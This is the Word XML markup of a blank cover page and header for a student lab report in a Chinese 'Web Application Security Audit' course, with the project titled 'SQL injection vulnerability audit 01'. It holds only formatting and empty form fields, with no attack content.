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4EB21C" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5363986D" wp14:editId="2EDB7DB1">
            <wp:extent cx="4123055" cy="9550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51934" cy="10081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13AE85" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="361AEFB2" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="426A4F2A" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="036BCD63" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Web应用安全审计课程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B2FB3F" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>实验（实训）报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425D8723" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19162F18" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03197C58" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2025-2026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>学年第</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>学期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C40088" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11551C9B" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLineChars="800" w:firstLine="2409"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>学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 xml:space="preserve">    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>院：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>人工智能与大数据学院</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09371D73" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLineChars="800" w:firstLine="2409"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>年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 xml:space="preserve">    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>级：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                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22718362" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLineChars="800" w:firstLine="2409"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>培养层次：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                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CA0414" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLineChars="800" w:firstLine="2409"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>专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 xml:space="preserve">    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>业：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>信息安全与管理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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0B61AD" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLineChars="800" w:firstLine="2409"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>班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 xml:space="preserve">    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>级：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               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAEE304" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLineChars="800" w:firstLine="2409"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>学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 xml:space="preserve">    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>号：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               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4800FE" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLineChars="800" w:firstLine="2409"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>姓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 xml:space="preserve">    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>名：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               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085B09E3" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="900" w:firstLine="2711"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2796F573" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="901" w:firstLine="2162"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="page" w:tblpX="8036" w:tblpY="1580"/>
        <w:tblW w:w="2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210"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EB2F43" w14:paraId="0E902009" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="668"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65530827" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC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lastRenderedPageBreak/>
              <w:t>成绩</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1210" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D6CB608" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43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EB2F43" w14:paraId="70C1BFDD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="668"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A29A58D" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC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教师</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AC0F979" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC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签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1210" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="182F7C56" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43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</w:tbl>
    <w:p w14:paraId="53EA6C35" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251661312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3571BEF3" wp14:editId="67B74D56">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>102870</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-172085</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2820035" cy="652780"/>
            <wp:effectExtent l="0" t="0" r="18415" b="13970"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="1459" y="0"/>
                <wp:lineTo x="0" y="3152"/>
                <wp:lineTo x="0" y="17019"/>
                <wp:lineTo x="1459" y="20802"/>
                <wp:lineTo x="3356" y="20802"/>
                <wp:lineTo x="20720" y="19541"/>
                <wp:lineTo x="21449" y="18280"/>
                <wp:lineTo x="20866" y="10086"/>
                <wp:lineTo x="21449" y="6304"/>
                <wp:lineTo x="20866" y="1891"/>
                <wp:lineTo x="3502" y="0"/>
                <wp:lineTo x="1459" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="7165675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567565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5186" cy="6637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3460EE2" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43"/>
    <w:p w14:paraId="11B5E7F2" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A8FDB5A" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:jc w:val="center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实验（实训）报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDEB428" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="560"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>类型：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="00A8"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>验证性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="00A8"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>演示性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="00FE"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>综合性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="00A8"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>设计研究性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="00A8"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>其他：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B23FAB" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="00EB2F43">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0641547F" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:rPr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课程名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>应用安全审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>课程性质：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>专业核心课</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135349A8" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:rPr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项目名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>注入漏洞审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">01  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>指导教师：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3D6A60" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:rPr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班级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>学号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>学生姓名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3826D57E" w14:textId="77777777" w:rsidR="00EB2F43" w:rsidRDefault="002669CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36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1ECD01" wp14:editId="7EABADB9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-17145</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>99695</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6078855" cy="0"/>
